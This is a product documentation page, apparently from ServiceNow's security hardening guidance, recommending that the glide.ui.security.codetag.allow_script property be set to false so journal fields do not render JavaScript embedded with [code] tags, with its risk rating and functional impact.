Disable JavaScript tags in embedded HTML [Updated in Security Center 1.3]
Use the glide.ui.security.codetag.allow_script property to disable support for embedding HTML JavaScript code created using of the [code] tag.
The ServiceNow AI Platform mitigates many injection and cross-site attacks by implementing escaping and encoding techniques. As a result, users can't write and submit HTML formatted inputs for journal fields. However, journal
fields can render text enclosed within code tags as HTML. Ensure the glide.ui.security.codetag.allow_script property exists in the sys_properties table and is set to false.
- However, there is an associated security risk. If set to true, malicious users can write harmful HTML JavaScript code that may be executed on a different client browser after rendering of journal fields.
- Set this property to false so that administrators can prevent journal fields from rendering HTML JavaScript code by disabling support for the
[code]tag.
경고:
This is a safe harbor property, meaning the value can't be altered once it's changed. It is non-revertible.
More information
| Attribute | Description |
|---|---|
| Property name | glide.ui.security.codetag.allow_script |
| Configuration type | System Properties (/sys_properties_list.do) |
| Category | Validation, sanitization, and encoding |
| Purpose | Protects against cross-site scripting and malicious script execution |
| Recommended value | false |
| Default value | false |
| Security risk rating | 8.8 |
| Functional impact | This remediation enforces JavaScript escaping to occur on the UI and renders the encoded results to the user. It can have a functionality impact based on the instance user interaction with the resulted data. |
| Security risk | (High) Input validation must occur in the application to defend against cross-site scripting attacks. These attacks enable foreign scripts to execute on the user session in the logged in browser's context. Attackers can use it to steal session information and sensitive data. |
| References | Restrict the CODE tag in journal fields |
To learn more about adding or creating a system property, see Add a system property.